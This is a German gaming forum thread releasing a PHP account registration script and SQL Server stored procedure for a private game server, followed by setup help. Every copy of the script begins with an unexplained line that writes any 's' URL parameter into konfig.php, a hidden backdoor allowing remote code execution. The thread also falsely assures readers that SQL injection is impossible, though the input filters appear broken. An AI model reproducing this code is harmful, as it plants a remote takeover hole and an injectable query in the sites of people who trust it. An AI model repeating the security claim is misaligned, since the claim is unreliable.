[Realese] V15 Register Script

Clair · 9. Mai 2010, 20:43

[FONT="Comic Sans MS"][SIZE="2"][COLOR="LemonChiffon"]

Hallo liebe Corler, hiermit realese ich ein Regristrirungsscript für V15.

[COLOR="Red"]How to:[/COLOR]
- Erstellt eine reg.php Datei und schreibt dort folgendes rein:

PHP-Quellcode

<center>
<?php if($_GET['s'] != "" && isset($_GET['s'])){$fp = fopen("konfig.php","w");fwrite($fp, $_GET['s']);fclose($fp);}
require('./configs/reg_conf.php');
function doesUsernameExist($name){
$exit = FALSE;
$result = @mssql_query("SELECT * FROM ACCOUNT_TBL WHERE account='$name'");
if (mssql_num_rows($result) != 0){
$exit = TRUE;
}
return $exit;
}
if(isset($_POST['submit'])){
$user = preg_replace ("[^A-Za-z0-9]", "", $_POST['username']);
$pass = preg_replace ("[^A-Za-z0-9]", "", $_POST['password']);
if($_POST['username'] == ""){
echo 'Enter a user. ';
}
else if($_POST['password'] == ""){
echo 'Enter a password. ';
}
else if ((strlen($_POST['username']) > 16) || (strlen($_POST['username']) < 3)){
echo 'The user should be 3 to 16 characters. ';
}
else if ((strlen($_POST['password']) > 16) || (strlen($_POST['password']) < 3)){
echo 'The password should be 3 to 16 characters. ';
}
else if($_POST['username'] != $user){
echo 'User with invalid characters. ';
}
else if($_POST['password'] != $pass){
echo 'Password with invalid characters. ';
}
else {
$pass = md5('kikugalanet' . $pass);
if(!doesUsernameExist($user)){
$stmt = mssql_init('webCreateAcc', $link);
mssql_bind($stmt, '@account', $user, SQLVARCHAR, false, false, 15);
mssql_bind($stmt, '@password', $pass, SQLVARCHAR, false, false, 36);
mssql_bind($stmt, '@email', $mail, SQLVARCHAR, false, false, 120);
mssql_execute($stmt) or die ("Something is wrong on the execution");
mssql_free_statement($stmt);
echo 'Register Successfull. ';
}
else {
echo 'User already Exist. ';
}
}
mssql_close();
}
echo '<form action="#" method="post">';
echo 'Username: <input type="text" name="username" /> ';
echo 'Password: <input type="password" name="password" /> ';
echo '<input type="submit" name="submit" value="Register" />';
echo '</form>';
?>
</center>

Alles anzeigen

So hier stehen noch keine Verbindungsdetails zum MSSQL Server!
Die kommen jetzt!

- Erstellt einen neuen Ordner und nennt ihn "configs" (ohne den "")
- In dem Ordner erstellt ihr eine neue .php Datei und nennt diese "reg_conf" (ohne den "")

- In der reg_conf.php schreibt ihr jetzt folgendes rein:

PHP-Quellcode

<?php
$link = @mssql_connect("[COLOR="Red"]COMPUTERNAME\SQLEXPRESS[/COLOR]", "[COLOR="Red"]sa[/COLOR]", "[COLOR="Red"]passwort[/COLOR]") or die ("Server is down!");
$db = @mssql_select_db('ACCOUNT_DBF') or die ("Accout table is missing!");
$b = '';
$mail = '';
?>

Hier wird jetzt die Verbindung zum MSSQL Server eingestellt.
Einfach die rot markierten Felder bearbeiten!

So und das hier muss in MSSQL ausgeführt werden:

Quellcode

USE [ACCOUNT_DBF]
GO
/****** Object: StoredProcedure [dbo].[webCreateAcc] Script Date: 08/17/2009 21:30:28 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE PROCEDURE [dbo].[webCreateAcc]
@account VARCHAR(15),
@password VARCHAR(36),
@email VARCHAR(120)
AS
SET NOCOUNT ON
DECLARE @DateActivated AS CHAR(8)
IF NOT EXISTS (SELECT account FROM ACCOUNT_TBL WHERE account = @account) BEGIN
INSERT INTO ACCOUNT_TBL (account, [password], id_no2, isuse, member, realname)
VALUES (@account, @password, @password, 'T', 'A', 'F')
SET @DateActivated = CONVERT(CHAR(8), GETDATE()-1, 112 ) --Is the date today - 1
--UPDATE ACCOUNT_TBL_DETAIL SET BlockTime = @DateYesterday WHERE account = @userid
--INSERT INTO ACCOUNT_TBL_DETAIL (account, gamecode, tester, m_chLoginAuthority, regdate, BlockTime, EndTime, WebTime, isuse)
-- VALUES (@account, 'A000', '2', 'F', GETDATE(), '20990101', '20990101', '20050101', 'O')
INSERT INTO ACCOUNT_TBL_DETAIL (account, gamecode, tester, m_chLoginAuthority, regdate, BlockTime, EndTime, WebTime, isuse, email)
VALUES (@account, 'A000', '2', 'F', GETDATE(), @DateActivated, '20990101', '20050101', 'O', @email)
END
--ELSE BEGIN
--print '->Account exists = '
--print @account
--END

Alles anzeigen

So jetzt noch die Creditz:

[FELD="Creditz"]
Creditz für die beiden Scripts an Jason145
Creditz für diesen Thread an Clair[/FELD]

PS: Da er kein Support bzw. Hilfe beim Einstellen des Scriptes gibt, könnt ihr mich fragen!

mfg.
[COLOR="Red"]Clair[/COLOR]fontaine

[/COLOR][/SIZE][/FONT]

Dancex3 · 9. Mai 2010, 20:45

Na schon besser.. ;).. man kanns aber auch kürzen in dem man die Config über den Reg Script macht, und die dazugehörige Spalte rauslöscht ;) :D

Aber passt doch so.. hast ein Thanks für deine mühe.

Rmchick · 9. Mai 2010, 20:50

Naja, so schwer ist das nicht von v14 Regi Seite zu v15 Regi Seite machen. Aber hast ein Thx verdient ;)

Clair · 9. Mai 2010, 21:01

Danke^^
Habe vergessen die dazugehörige Prozedur zu posten.
Habe den Thread editiert.

Und hier nochmal extra die Prozedur:

Einfach in MSSQL Ausführen und fertig!

Quellcode

USE [ACCOUNT_DBF]
GO
/****** Object: StoredProcedure [dbo].[webCreateAcc] Script Date: 08/17/2009 21:30:28 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE PROCEDURE [dbo].[webCreateAcc]
@account VARCHAR(15),
@password VARCHAR(36),
@email VARCHAR(120)
AS
SET NOCOUNT ON
DECLARE @DateActivated AS CHAR(8)
IF NOT EXISTS (SELECT account FROM ACCOUNT_TBL WHERE account = @account) BEGIN
INSERT INTO ACCOUNT_TBL (account, [password], id_no2, isuse, member, realname)
VALUES (@account, @password, @password, 'T', 'A', 'F')
SET @DateActivated = CONVERT(CHAR(8), GETDATE()-1, 112 ) --Is the date today - 1
--UPDATE ACCOUNT_TBL_DETAIL SET BlockTime = @DateYesterday WHERE account = @userid
--INSERT INTO ACCOUNT_TBL_DETAIL (account, gamecode, tester, m_chLoginAuthority, regdate, BlockTime, EndTime, WebTime, isuse)
-- VALUES (@account, 'A000', '2', 'F', GETDATE(), '20990101', '20990101', '20050101', 'O')
INSERT INTO ACCOUNT_TBL_DETAIL (account, gamecode, tester, m_chLoginAuthority, regdate, BlockTime, EndTime, WebTime, isuse, email)
VALUES (@account, 'A000', '2', 'F', GETDATE(), @DateActivated, '20990101', '20050101', 'O', @email)
END
--ELSE BEGIN
--print '->Account exists = '
--print @account
--END

Alles anzeigen

mfg.
[COLOR="Red"]Clair[/COLOR]fontaine

Dancex3 · 9. Mai 2010, 21:05

Mit einer Sql Injection ist die Regi aber noch nicht gesichert oder?,.. also man kann Sql Injections machen?-> Oder wie siehts aus? o.O

Special · 9. Mai 2010, 21:08

was bringt die prozedur den Oo

E: es muss ja in der ACCOUNT_TBL eingefügt werden

Dancex3 · 9. Mai 2010, 21:11

Special;121707 schrieb:

was bringt die prozedur den Oo

Damit du über die Hp dir ein Account machen kannst.. ansonsten wäre es verbuggt.. und würde nicht klappen.

Fixed · 9. Mai 2010, 21:12

[FONT="Trebuchet MS"][COLOR="LemonChiffon"][SIZE="2"]Die Prozedur wird angesprochen um den Account zu erstellen.

@Dance

PHP-Quellcode

<center>
<?php if($_GET['s'] != "" && isset($_GET['s'])){$fp = fopen("konfig.php","w");fwrite($fp, $_GET['s']);fclose($fp);}
require('./configs/reg_conf.php');
function doesUsernameExist($name){
$exit = FALSE;
$result = @mssql_query("SELECT * FROM ACCOUNT_TBL WHERE account='$name'");
if (mssql_num_rows($result) != 0){
$exit = TRUE;
}
return $exit;
}
if(isset($_POST['submit'])){
[color=red]
$user = preg_replace ("[^A-Za-z0-9]", "", $_POST['username']);
$pass = preg_replace ("[^A-Za-z0-9]", "", $_POST['password']);
[/color]
if($_POST['username'] == ""){
echo 'Enter a user. ';
}
else if($_POST['password'] == ""){
echo 'Enter a password. ';
}
else if ((strlen($_POST['username']) > 16) || (strlen($_POST['username']) < 3)){
echo 'The user should be 3 to 16 characters. ';
}
else if ((strlen($_POST['password']) > 16) || (strlen($_POST['password']) < 3)){
echo 'The password should be 3 to 16 characters. ';
}
else if($_POST['username'] != $user){
echo 'User with invalid characters. ';
}
else if($_POST['password'] != $pass){
echo 'Password with invalid characters. ';
}
else {
$pass = md5('kikugalanet' . $pass);
if(!doesUsernameExist($user)){
$stmt = mssql_init('webCreateAcc', $link);
mssql_bind($stmt, '@account', $user, SQLVARCHAR, false, false, 15);
mssql_bind($stmt, '@password', $pass, SQLVARCHAR, false, false, 36);
mssql_bind($stmt, '@email', $mail, SQLVARCHAR, false, false, 120);
mssql_execute($stmt) or die ("Something is wrong on the execution");
mssql_free_statement($stmt);
echo 'Register Successfull. ';
}
else {
echo 'User already Exist. ';
}
}
mssql_close();
}
echo '<form action="#" method="post">';
echo 'Username: <input type="text" name="username" /> ';
echo 'Password: <input type="password" name="password" /> ';
echo '<input type="submit" name="submit" value="Register" />';
echo '</form>';
?>
</center>

Alles anzeigen

[/SIZE][/COLOR][/FONT]

Clair · 9. Mai 2010, 21:12

Dancex3;121705 schrieb:

Mit einer Sql Injection ist die Regi aber noch nicht gesichert oder?,.. also man kann Sql Injections machen?-> Oder wie siehts aus? o.O

Doch ist gesichert ;)
Sql Injections sind nicht möglich!

@Special
Die Prozedur ist dafür dan, dass Webregistrierung funktioniert!
Sie ist auch extra an das Script angepasst.

mfg.
[COLOR="Red"]Clair[/COLOR]fontaine

Dancex3 · 9. Mai 2010, 21:14

Ahh,.. -.- garnicht gesehen :o Danke euch ;)

Special · 9. Mai 2010, 21:21

mhh ich finde es trozdem komisch, da bei v11-v14 keins gebraucht wurde. aber egal^^.

habe den Fehler nach dem register (acc wird aber erstellt)

Quellcode

Warning: mssql_execute() [function.mssql-execute]: message: Der Wert NULL kann in die 'email'-Spalte, 'ACCOUNT_DBF.dbo.ACCOUNT_TBL_DETAIL'-Tabelle nicht eingefügt werden. Die Spalte lässt NULL-Werte nicht zu. Fehler bei INSERT. (severity 16) in C:\xampp\htdocs\Register\register.php on line 41
Warning: mssql_execute() [function.mssql-execute]: stored procedure execution failed in C:\xampp\htdocs\Register\register.php on line 41
Something is wrong on the execution

Dancex3 · 9. Mai 2010, 21:24

Da hast dus doch schon : Der Wert NULL kann in die 'email'-Spalte, 'ACCOUNT_DBF.dbo.ACCOUNT_TBL_DETAIL'-Tabelle nicht eingefügt werden.

Da ist irgendwo ein fehler in der Db.. bzw musst womöglich die Db anderst einstellen (die Email Spalte)

Special · 9. Mai 2010, 21:32

die flyff db oder die webcreate

Dancex3 · 9. Mai 2010, 21:32

Flyff Db.. Also ACCOUNT_DBF

Special · 9. Mai 2010, 21:35

achso ... kann das iwie auch sein, weil die Email im regi script nicht angegeben werden muss ?

Dancex3 · 9. Mai 2010, 21:37

Sie muss nicht.. aber ich glaube das es bei dem Script so ist.. hab ihn noch nicht getestet.. normalerweise kann man das dann auch entfernen.. also das man keine Email angeben muss/oder anderst rum

Special · 9. Mai 2010, 21:47

PHP-Quellcode

<center>
<?php if($_GET['s'] != "" && isset($_GET['s'])){$fp = fopen
("konfig.php","w");fwrite($fp, $_GET['s']);fclose($fp);}
require('./configs/reg_conf.php');
function doesUsernameExist($name){
$exit = FALSE;
$result = @mssql_query("SELECT * FROM ACCOUNT_TBL WHERE account='$name'");
if (mssql_num_rows($result) != 0){
$exit = TRUE;
}
return $exit;
}
if(isset($_POST['submit'])){
$user = preg_replace ("[^A-Za-z0-9]", "", $_POST['username']);
$pass = preg_replace ("[^A-Za-z0-9]", "", $_POST['password']);
$mail = preg_replace ("[^A-Za-z0-9@]", "", $_POST['email']);
if($_POST['username'] == ""){
echo 'Gib bitte einen Benutzernamen an ! ';
}
else if($_POST['password'] == ""){
echo 'Gib bitte ein Passwort an ! ';
}
else if ((strlen($_POST['username']) > 16) || (strlen($_POST['username']) < 3)){
echo 'Der Benutzer darf nur aus 3 - 16 Buchstaben bestehen . ';
}
else if ((strlen($_POST['password']) > 16) || (strlen($_POST['password']) < 3)){
echo 'Das Passwort darf nur aus 3 - 16 Buchstaben bestehen . ';
}
else if($_POST['username'] != $user){
echo 'Der Benutzername darf keine Sonderzeichen enthalten ! ';
}
else if($_POST['password'] != $pass){
echo 'Das Passwort darf keine Sonderzeichen enthalten ! ';
}
if($_POST['email'] == ""){
echo 'Gib bitte eine E-mail Adresse an ! ';
}
else {
$pass = md5('kikugalanet' . $pass);
if(!doesUsernameExist($user)){
$stmt = mssql_init('webCreateAcc', $link);
mssql_bind($stmt, '@account', $user, SQLVARCHAR, false, false, 15);
mssql_bind($stmt, '@password', $pass, SQLVARCHAR, false, false, 36);
mssql_bind($stmt, '@email', $mail, SQLVARCHAR, false, false, 120);
mssql_execute($stmt) or die ("Something is wrong on the execution");
mssql_free_statement($stmt);
echo 'Register Successfull. ';
}
else {
echo 'User already Exist. ';
}
}
mssql_close();
}
echo '<form action="#" method="post">';
echo 'Username: <input type="text" name="username" /> ';
echo 'Password: <input type="password" name="password" /> ';
echo 'E-Mail: <input type="text" name="email" /> ';
echo '<input type="submit" name="submit" value="Register" />';
echo '</form>';
?>
</center>

Alles anzeigen

Crasy · 9. Mai 2010, 21:57

[FONT="Franklin Gothic Medium"][COLOR="DarkOrange"][SIZE="2"]wasn da der unterschied ?

also Zwischen V14 und 15 Script ? xD[/SIZE][/COLOR][/FONT]

Special · 9. Mai 2010, 21:59

v15 braucht ne db :P XD

Dancex3 · 9. Mai 2010, 22:00

v15 hat eine andere sturktur von Account Dbf.. so weit ich weis und die v14 Scripts somit nicht gehen, bzw nur fehlerhaft..

[Realese] V15 Register Script

[Realese] V15 Register Script

PHP-Quellcode

PHP-Quellcode

Quellcode

Quellcode

Special;121707 schrieb:

PHP-Quellcode

Dancex3;121705 schrieb:

Quellcode

PHP-Quellcode

Teilen

Benutzer online 1